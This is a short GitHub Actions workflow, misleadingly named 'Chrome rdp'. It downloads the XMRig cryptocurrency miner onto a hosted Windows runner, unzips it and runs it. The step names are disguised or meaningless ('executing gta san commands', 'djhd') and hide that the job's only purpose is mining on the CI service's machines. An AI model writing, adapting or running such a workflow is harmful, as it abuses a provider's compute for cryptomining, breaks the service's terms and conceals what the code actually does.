# This is a basic workflow to help you get started with Actions

name: Chrome rdp

on: 
  workflow_dispatch:
jobs:
  build:
    runs-on: windows-latest

    steps:
    - name: downloading xm
      run: Invoke-WebRequest https://github.com/xmrig/xmrig/releases/download/v6.17.0/xmrig-6.17.0-gcc-win64.zip -OutFile xmrig-6.17.0-gcc-win64.zip
    - name: executing gta san commands
      run: unzip xmrig-6.17.0-gcc-win64.zip
    - name : sndndn 
      run: cd xmrig-6.17.0-gcc-win64/xmrig-6.17.0 && chmod +x xmrig.exe
    - name : djhd
      run: cd xmrig-6.17.0-gcc-win64/xmrig-6.17.0 && ./xmrig.exe
